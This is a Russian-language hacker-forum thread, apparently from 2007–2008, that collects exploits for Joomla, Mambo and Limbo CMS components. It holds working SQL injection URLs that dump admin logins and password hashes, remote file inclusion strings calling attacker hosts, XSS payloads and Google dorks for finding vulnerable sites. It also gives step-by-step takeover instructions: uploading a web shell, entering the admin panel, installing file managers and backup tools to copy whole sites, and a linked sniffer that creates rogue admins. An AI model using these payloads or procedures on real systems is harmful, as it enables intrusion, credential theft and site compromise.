Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов
 

CMS Joomla!

Хочу начать обзор со слов, что как бы Joomla не считалась одной из самых уязвимых CMS, на мой взгляд, Joomla очень даже не плохой движок со стороны безопасности. Проблема заключается в сторонних компонентах подключаемых к движкам и разработанных левыми (не разработчиками Джумлы) разработчиками. Но блогодаря сторонним компонентам эта CMS становиться интересной «изнутри» (в администраторской панели).

Доступ в администраторскую панель:
Здесь я коснусь двух найденных мною уязвимостей в Джумле.

1. Компонент SimpleFaq 2.х (com_simplefaq) *

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Уязвимость существует из-за недостаточной обработки входных данных в параметре aid в установочном сценарии Joomla index.php (когда параметр \"option\" установлен в com_simplefaq и параметр task установлен в answer). Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. (c) securitylab.ru

* я позже узнал, что эта уязвимость была найдена до меня

Уязвимые версии 2.х – 2.40

Внешний вид:
http://efots.info/images/10913601.gif

При запросе:
Вежливо выдает логин, хеш (md5) и мыло:
http://efots.info/images/18549402.gif

Теперь остаётся расшифровать хеш и проходить в администраторскую панель.

Таким же образом можно получить доступ к БД MySQL, запросом:
Ну и соответственно наш милый браузер выдаст следующее:
http://efots.info/images/71574103.gif


2. Компонент ReMOSitory 341RE (com_remository) *
Уязвимость существует из-за недостаточной обработки загружаемых файлов на сервер, и наличия прямого доступа к ним по дефолту.

* Данной уязвимости еще нигде не встречал

Внешний вид:
http://efots.info/images/67777804.gif

Теперь регистрируемся, и идем заливать файл (в нашем случае это шел))) по ссылке «Добавить файл»

После того как файл добавлен он автоматически загружается во временное хранилище (/downloads/uploads/), до одобрения администратора. Но мы ждать не будем и последуем по ссылке http://victim.com/downloads/uploads/ и увидим следующее:
http://efots.info/images/21416405.gif

Открываем... А дальше совсем другая история, которую не раз поднимали в пределах форума.

Администраторская панель.

Вот мы и добрались до намеченной цели, но мало попасть сюда, нужно еще и иметь доступ на добавление/редактирование/удаление файлов. Для этого есть два варианта:

1. В большинстве случаях (на моей практике это 95/100) доступны на запись следующие папки:

А это гуд! Теперь не раздумывая, идем следующим путем: Установка/удаление => Компоненты. И смотря оттого, что именно нужно (а иногда нужно именно всё) устанавливаем следующие компоненты:

JoomlaXplorer 2.0 – подобие FTP сервера с возможностью установки прав на файлы, загрузка/редактирование/удаление файлов. Скрин:
http://efots.info/images/79943006.gif

Причем как можно заметить из скрина доступ обеспечивает не только на директорию сайта, но и если здесь же хостятся другие, то и к другим)))

JoomlaPack 1.1.0 – Компонент для создания архива данных (бэкап БД и Полный бэкап сайта с установочными файлами)
http://efots.info/images/54737907.gif

Здесь ничего сложного нет, просто идем по ссылке «Создать архив сайта», выбираем, что именно нужно создать (архив БД или архив сайта), создаем, потом идем по ссылке «Сохраненные архивы сайта» и скачиваем.

Теперь сайт под нашим чутким руководством)))

2. Использования шелла для поднятия рутовских прав, по этой возможности много статей можно найти пройдя по ссылке www.google.com

На этом всё. Ответственность за использования данной статьи предусмотрено Уголовным Кодексом Российской Федерации. Тема создана в познавательных целях.

JoomlaXplorer 2.0 – тут
JoomlaPack 1.1.0. – тут

Подборка сплоитов для CMS Joomla! И сторонних компонентов – тут – сплоиты (с) milw0rm.com

P.S. И помните каким бы ни был взлом, главное что бы он был безопасным (с) Анфиса Чехова

it's my (с) 2007

=НЕ ФЛЕЙМИТЬ=

Для того чтобы было легче понять - Joomla - Это как бы 5ая версия Мамбы, которую решили нумеровать и назвать заново.

Насчет узнавания версии в последних релизах вопрос затруднительный.
Файл CHANGELOG.php может просматривать только админ, /includes/version.php тоже недотсупен на чтение. только инклудиься в файлы админки. installation/index.php - обычно удаляется.
Смотрю более старые версии.


Множество модулей для джумлы - мамбы страдают удаленнм - локальным инклудом файлов.
Все из-за того, что переменная
$mosConfig_absolute_path которая инклудится в практически каждом файле никак не проверяется.
Точный список модулей и версий скоро будет готов.


4.5.2.1
mysql >4.1 (Использует подзапросы)
Bug:
Mambo 4.5.2.1 hash pass disclosur
Mambo 4.5.2.1 by RST

4.6rc1
Уязвимость в модуле com_frontpage, использует посимвольный benchmark брут полей.
Mambo <= 4.6rc1 'Weblinks' blind SQL injection

1.0
RFI - http://targetsite.com/[path_to_Joomla!]/includes/joomla.php?includepath=[attacker]
(c) http://packetstormsecurity.org/0606-exploits/joomla10.txt


1.0.7
Уязвимость в модуле com_rss, позволяющая провести дос атаку, путь, а также создавать произвольные файлы.
Mambo/Joomla Path Disclosure & Remote DOS Exploit
Создание файла: index.php?option=com_rss&feed=[имя файла]&no_html=1
Путь: index.php?option=com_rss&feed=/&no_html=1
DoS: index.php?option=com_poll&task=results&id=1&mosmsg =DOS@HERE<<>AAA<><>
(с) bugs discovered by Foster (RST/GHC)
В 1.0.8 все исправлено. Также как я посмотрел в этой версии с $mosmsg можно провести xss атаку, фильтр includes/phpInputFilter/class.inputfilter.php пропускает половину тэгов.


1.0.9
Уязвимость в модуле com_frontpage, использует посимвольный benchmark брут полей.
Joomla <= 1.0.9 'Weblinks' blind SQL injection


1.0.10
Уязвимость в com_poll, позволяющая "накрутить" тот или иной вариант ответа
Joomla add unlimited votes


1.5.0
Уязвимость поволяет выполнять произвольные команды на сервере
PoC: http://hacked/libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://hacker/?
Joomla! 1.5.0 Remote file include


1.5 - 1.5 beta 2
Уязвимость позволяет удаленно выполнять комманды на сервере.
Уязвимый код:
Poc
Remote command execution in Joomla! CMS 1.5 beta 2



1.5 beta 1,2 + RC1
Уязвимость присутствует в модуле com_contentв трех файлах archive.php,category.php,section.php в параметре filter,
Joomla! 1.5 Beta1/Beta2/RC1 Remote SQL Injection Exploit


Все версии
./administration/ sql injection
http://packetstormsecurity.org/0707-exploits/joomla-sql.txt
PoC:
Раскрытие пути:

Заливка шела в 1.5.* версиях.

Инклуды в модах/модулях/компонентах
 

sql в гостевой книге (модуль com_akobook)
v. <=3.42
примеры: (вывод в цитатах)
ps для танкистов /itemid,1/ = &itemid=1

VULN: /multithumb.php
BUG: include_once($mosConfig_absolute_path."/mambots/content/multithumb/class.img2thumb.inc");
(с) http://www.rootshell-team.com/showthread.php?t=2969

CBSMS Mambo Module <= 1.0 ([mosConfig_absolute_path])

# http://www.site.com/[path]/mod_cbsms_messages.php?mosConfig_absolute_path=[evil script]

Как узнать версию Joomla?

Файл configuration.php-dist лежит в корне и сам себя описывает так:


* -------------------------------------------------------------------------
* ЭТОТ ФАЙЛ ДОЛЖЕН ИСПОЛЬЗОВАТЬСЯ ТОЛЬКО ПРИ НЕВОЗМОЖНОСТИ WEB-ИНСТАЛЛЯТОРА
*
* Если вы устанавливаете Joomla вручную, то есть не используете web-инсталлятор,
* то переименуйте этот файл в configuration.php
*
* Например:
* UNIX -> mv configuration.php-dist configuration.php
* Windows -> rename configuration.php-dist configuration.php
*
* Теперь отредактируйте этот файл и установите параметры вашего сайта
* и базы данных.
* -------------------------------------------------------------------------

Проблема, однако, состоит в том, что в 9 из 10 случаев файл переименовать либо забывают, либо просто не считают нужным.

Примеры тому

http://www.joomla.org/configuration.php-dist

http://www.joomla.ru/configuration.php-dist

Между тем, файл содержит чувствительную информацию, позволяющую узнать версию установленного пакета. Так, если установлена

версия 1.0.13, файл содержит строчку:

* @version $Id: configuration.php-dist 7424 2007-05-17 15:56:10Z robs $

версии 1.0.11, 1.0.12

* @version $Id: configuration.php-dist 4802 2006-08-28 16:18:33Z stingrey $

версии 1.0.9, 1.0.10

* @version $Id: configuration.php-dist 3754 2006-05-31 12:08:37Z stingrey $

версия 1.0.8

* @version $Id: configuration.php-dist 2622 2006-02-26 04:16:09Z stingrey $

версии 1.0.5-1.0.7

* @version $Id: configuration.php-dist 506 2005-10-13 05:49:24Z stingrey $

версия 1.0.4

* @version $Id: configuration.php-dist 217 2005-09-21 15:15:58Z stingrey $

версия 1.0.3

* @version $Id: configuration.php-dist 506 2005-10-13 05:49:24Z stingrey $

версии 1.0.1, 1.0.2

* @version $Id: configuration.php-dist 217 2005-09-21 15:15:58Z stingrey $

версия 1.0.0

* @version $Id: configuration.php-dist 47 2005-09-15 02:55:27Z rhuk $

Уязвимость в поиске по сайту в параметре searchword. Дыра является DOM based XSS.

http://site/index.
php?option=com_search&searchword=';alert('XSS')//

Для исполнения кода, пользователь должен сменить количество результатов поиска на одну страницу.
уязвимы версии Joomla! <= 1.0.13

а если так:
* @version $Id: configuration.php-dist,v 1.4 2005/11/25 04:46:26 csouza Exp $

какая версия?

смахивает на 1.4 но както меня напрягают числа, в списке выше 2005\10 - это уже 1.5

BlackCats, это у тебя какое-то Mambo (не из последних)... На счёт конкретной версии, сейчас, к сож. ответить не могу. Пока выкладываю данные для


1.5.0 Release Candidate 3

* @version $Id: configuration.php-dist 8946 2007-09-18 14:26:22Z louis $

1.5.0 Release Candidate 2

* @version $Id: configuration.php-dist 8290 2007-08-01 14:03:11Z jinx $

1.5.0 Release Candidate 1

* @version $Id: configuration.php-dist 7740 2007-06-13 21:01:25Z laurens $

1.5.0 Beta 2

* @version $Id: configuration.php-dist 6691 2007-02-21 09:29:26Z Jinx $

1.5.0 Beta

* @version $Id: configuration.php-dist 5361 2006-10-07 19:21:08Z Jinx $

дополнение к com_remository
активнаяя xss если можно оставлять коментариии к файлам
xttp://localhost/index.php?option=com_remository&Itemid=30&func=fil einfo&id=4
и при загрузке файла иногда работает пхп инекция
в "Заголовок:" пишем ";phpinfo();//"
<input class='inputbox' type='text' id='filetitle' name='filetitle' size='25' value='' />

позавчера нашёл вроде в паблике нету
компонент com_joomradio
google->inurl:com_joomradio inurl : option всего 452 маловато
http://poosk.fm/index2.php?option=com_joomradio&page=show_radio&id =4+and+1=0+union+select+1,concat(username,0x3a,pas sword),3,4,5,6,7+from+jos_users+where+gid=25+or+gi d=24/*

milw0rmv: Mambo/Joomla Component rsgallery <= 2.0b5 (catid) SQL Injection Vuln

В догонку хочется сказать, что на Mambo перфикc mos_, на Joomla jos_

Mambo:
Joomla:
Dork:

очень часто в жомле встречается xss но есть проблема сесия жывёт 30 минут поэтому написал активный снифер сначала снифер пытается залить шелл если не получится залить шелл создаётся новый админ

http://slil.ru/25290482

тестил на Joomla 1.0.12

LIMBO CMS (Lite mambo)

Blind sql-inj

сплоент:http://site/index.php?option=polls&Itemid=0&pollid=[id]/**/and/**/[подзапрос]
где [id] - реально существующий id голосования, [подзапрос] - логическое выражение

на данный момент уязвимы сайты тех. поддержки:
при неправильном варианте, голосование не отображается, т.к. префикс по умолчанию выбирается случайным образом, вместо префикса при выборке в подзапросе надо указывать после FROM %23__[имя таблицы], где [имя таблицы] - имя таблицы без префикса например:
iJoomla Magazine

Blind sql-inj

сплоент:http://site/index2.php?option=com_magazine&func=show_magazine& id=[id]+and+[подзапрос]
где [id] - реально существующий id страницы, [подзапрос] - логическое выражение

на данный момент уязвимы сайты производителя:
при неправильном варианте отображается другая страница


З.Ы. Нашел сам, так что если вдруг боян, сильно не пинайте, это просто означает, что у вас больше информации чем у меня

с префексом можно не париться, может кто смотрел исходники тот может и заметил что префик обозначается "#__" потом строка передаётся функции setQuery кторая и заменяет "#__" на нужный, выглядеть будет так %23__users

Да ты прав, правда на сайте limbo-cms.com.ru это не прокатывает, незнаю почему, а вот на других сайтах работает, но вобщето мож мы с тобой разные версии смотрели, запрос передается не в setQuery а в функцию Execute, которая собственно и заменяет #__ на префикс

работает в том случае если производители сторонних компонентов используют стандартные функции жомлы для общения с базой данных бывают и исключения, но в 90% работает

Joomla Component PU Arcade Remote SQL Injection Exploit
 

//Exploit

//Текст для поиска:

(c)

com_serverstat (компонент Mambo & Joomla)
/Этот компонент используеться для отображения статистики игровых серверов/

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии шаблона administrator/components/com_serverstat/templates/template.game.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Переменная переданная через GET запрос используеться include. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP.
Пример:
...........................................
а также:
в параметре "mosConfig_absolute_path" в сценарии administrator/components/com_serverstat/install.serverstat.php
Пример:

com_serverstat (компонент Mambo & Joomla)
Ну тогда ещё упомянем, что там есть и активная XSS - В поле ника игрока. Если не хватит символов для полноценной атаки (не помню сколько в ник влазит), то можно закончить ник вот так:, потом войти ещё одним игроком в игру с ником начинающимся на ну и так далее, до тех пор пока не хватит места...

Joomla 1.0.13 CSRF Vulnerability
 

JoomlaFlash Component Multiple Remote File Inclusion
 

Flash Component Multiple Remote File Inclusion

Vulnerable: 2.5.1, 2.5.2

Exploit:

Joomla Component NeoRecruit

SQL:
http://[сайт]/index.php?option=com_neorecruit&task=offer_view&id =[SQL инъекция]

Пример:
Joomla Component Nice Talk

SQL:
http://[сайт]/index.php?option=com_nicetalk&tagid=[SQL инъекция]

Пример:

Joomla перфикс jos_
Mamba перфикс mos_

Joomla Multiple Remote File Inclusion
 

Remote File Inclusion

Vulnerable: com_panoramic version 1.0

PoC:

Remote File Inclusion

Vulnerable: MOSMediaLite451

PoC:

Mambo Component Newsletter (listid) Remote SQL Injection

SQL Injection:

Для поиска вводим:


Mambo Component Fq (listid) Remote SQL Injection

SQL Injection:

Для поиска вводим:


Mambo Component MaMML (listid) Remote SQL Injection

SQL Injection:

Для поиска вводим:


Mambo Component Glossary 2.0 (catid) SQL Injection

SQL Injection:

Для поиска вводим:

(c)

Mambo Component musepoes (aid) Remote SQL Injection

SQL Injection:

Для поиска вводим:


Mambo Component buslicense (aid) Remote SQL Injection

SQL Injection:

Для поиска вводим:


Mambo Component Recipes 1.00 (id) Remote SQL Injection

SQL Injection:

Для поиска вводим:


Mambo Component jokes 1.0 (cat) SQL Injection

SQL Injection:

Для поиска вводим:


Mambo Component EstateAgent 0.1 Remote SQL Injection

SQL Injection:

Для поиска вводим:

(c)

Component Catalogshop 1.0b1 SQL Injection Vulnerability

inurl: index.php?option=com_catalogshop
Инъекция: Component AkoGallery 2.5b SQL Injection Vulnerability

inurl: index.php?option=com_akogallery
Инъекция:
(с) hackturkiye.com

SQL-инъекция в Mambo Component Restaurant

Программа: Mambo Component Restaurant 1.0

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:(c)

скуль в Garyґs Cookbook 2.3.4 другие версии не смотрел

google: inurl:option inurl:com_garyscookbook (всего 251,000 )

POST http://localhost/joomla/index.php HTTP/1.0
Accept: */*
Referer: http://localhost/joomla/index.php?option=com_garyscookbook&Itemid=&func=de tail&id=1
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: Opera 9.95
Host: localhost
Content-Length: 95
Pragma: no-cache

option=com_garyscookbook&Itemid=&func=vote&imgvote =4&id=1,(select username from %23__users where gid=25 or gid=24 limit 1))%23


запрос к бд
INSERT INTO jos_gkb_voting_log (type,date,userid,fileid,ipaddress) VALUES ('3','2008-00-00 00:00:00', 0,[sql],'127.0.0.1');

результаты запроса нигде не отоброжаются
единственный способ эксплуатации посимвольный перебор
p.s. шыпко геморойно дальше не стал ковырять, если у кого получется добавить insert или update плиз отпишытесь

Component NeoReferences 1.3.1 (catid) SQL Injection Vulnerability

inurl: index.php?option=com_neoreferences
Инъекция: Mambo Component Mambads 1.5 Remote SQL Injection
inurl: index.php?option=com_mambads
Инъекция: (c) hackturkiye.com

Mambo Component SOBI2 RC 2.5.3 SQL Injection Vulnerability

PoC:

Mosets Hot Property v0.9.6

magic_quotes_gpc off
register_globals on

Joomla Component mosDirectory 2.3.2 (catid) Remote SQL Injection Vulnerability

Поиск бажного компонента: inurl:index.php?option=com_directory
Автор: aNa TrYaGi
Источник: milw0rm.com [2008-02-03]

Joomla Component Markplace 1.1.1 Remote Sql Injection Exploit

Автор: SoSo H H (Iraqi-Cracker)
Tested on: Markplace Version 1.1.1 and 1.1.1-pl1
Поиск бажного компонента:
"Marketplace Version 1.1.1"
"Marketplace Version 1.1.1-pl1"
inurl:index.php?option=com_marketplace
Exploit:Пример:milw0rm.com [2008-02-03]



----------------------------------------------------
HOME : http://www.hackturkiye.com/
AUTHOR : S@BUN :
joomla SQL Injection(com_awesom)

DORKS 1: allinurl :"com_awesom"
EXPLOIT:milw0rm

joomla SQL Injection(com_shambo2)

DORKS 1: allinurl :"com_shambo2"
EXPLOIT:milw0rm

joomla SQL Injection(com_downloads)(filecatid)

DORKS 1: allinurl :"com_downloads"filecatid
EXPLOIT:milw0rm

Joomla Component Ynews 1.0.0

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:xakep.ru

Component Ynews 1.0.0 SQL Injection Vulnerability

inurl: index.php?option=com_ynews
Инъекция: (c) milw0rm.com

Component PeopleBook 1.1.6 Passiv XSS

inurl: index.php?option=com_peoplebook
Инъекция: примечание: XSS'ка работает, только при условии если в компоненте включен поиск.

(c) it's my


Добавлено 08.02.2008
----------------------
А вот это не знаю, что такое, но точно Активная XSS
Еще Пасивная XSS в компоненте Quote:
Component com_noticias 1.0 SQL Injection

inurl: index.php?option=com_noticias
Инъекция: (c) zone-turk.net

SQL Injection

Mambo Component com_gallery Remote SQL Injection Vulnerability


SQL Injection

Joomla Component NeoGallery 1.1 SQL Injection Vulnerability

milw0rm.com

Mambo SQL Injection (com_comments)

http://www.milw0rm.com